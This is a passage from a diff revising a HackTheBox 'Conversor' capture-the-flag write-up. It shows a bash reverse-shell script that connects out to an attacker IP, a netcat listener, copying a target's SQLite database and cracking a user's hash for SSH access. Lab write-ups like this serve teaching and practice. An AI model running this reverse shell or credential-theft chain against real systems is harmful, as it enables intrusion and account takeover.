Ouss6116/HackTheBox-Writeup/Conversor/HTB-Conversor-Writeup.md

 </xsl:stylesheet>
 ```

-and we prepare a python http server by using the command `python3 -m http.server`, where the reverse shell script exist:
+On our machine we started a simple HTTP server with `python3 -m http.server` to host the reverse-shell script:

 ```sh
 #!/bin/bash
 bash -c 'bash -i >& /dev/tcp/10.10.14.203/9999 0>&1'
 ```

-and last thing, nc listener `nc -nlvp 9999`.
+Then we ran a netcat listener: `nc -nlvp 9999`.

-and by that we get our initial access, as you can see:
+This gave us initial access, as shown below:

 ![Icon](Images/xsltrevshell.png)

-### DB Exploit
+### Database download

-For the next step, we will copie the DB to our local machine so we can exploit it peacefully, so i launched a python http server in the victim machine to copy the DB:
+Next, we copied the SQLite database from the target to our machine so we could analyze it safely.
+We launched a Python HTTP server on the victim to serve the DB and downloaded it locally:

 ![Icon](Images/dbdownload.png)

-i open the DB with sqlite browser, and found the user fismathack with it hashed password
+I opened the DB with `sqlitebrowser` and found the user **fismathack** with a hashed password:

 ![Icon](Images/sqlitebrowser.png)

-### Final Touch
+### Final step

-By cracking the hash via [CrackStation](https://crackstation.net), we can login with fismathack and via SSH and capture the USER.TXT flag.
+After cracking the hash with [CrackStation](https://crackstation.net) we could log in as **fismathack** over SSH and capture the `USER.TXT` flag.

 ![Icon](Images/usertxt.png)